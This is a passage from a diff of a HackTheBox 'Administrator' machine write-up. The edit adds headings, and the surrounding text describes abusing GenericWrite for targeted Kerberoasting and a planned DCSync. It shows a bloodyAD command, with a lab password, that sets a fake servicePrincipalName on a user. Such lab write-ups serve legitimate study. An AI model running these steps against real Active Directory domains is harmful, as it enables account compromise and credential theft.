bytebl33d/bytebl33d.github.io/writeups/HackTheBox/Machines/administrator.md

 *Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
 ```

-# Root
+## Root
 Emily also has `GenericWrite` access to `Ethan`.
 We can therefore perform the same attacks as before and perform a targeted Kerberoast attack.

 ![](/assets/images/writeups/administrator/BH-DCSync.png)

 From the BloodHound data we see that `ethan` has the `DS-Replication-Get-Changes` and the `DS-Replication-Get-Changes-All` permission on the domain `ADMINISTRATOR.HTB`.

+### DCSync
 We can perform a DCSync attack after compromsing his account.
 Let's proceed!

 ```console
 $ bloodyAD --host 10.10.11.42 -d administrator.htb -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' set object ethan servicePrincipalName -v 'fake2/dc.administrator.htb'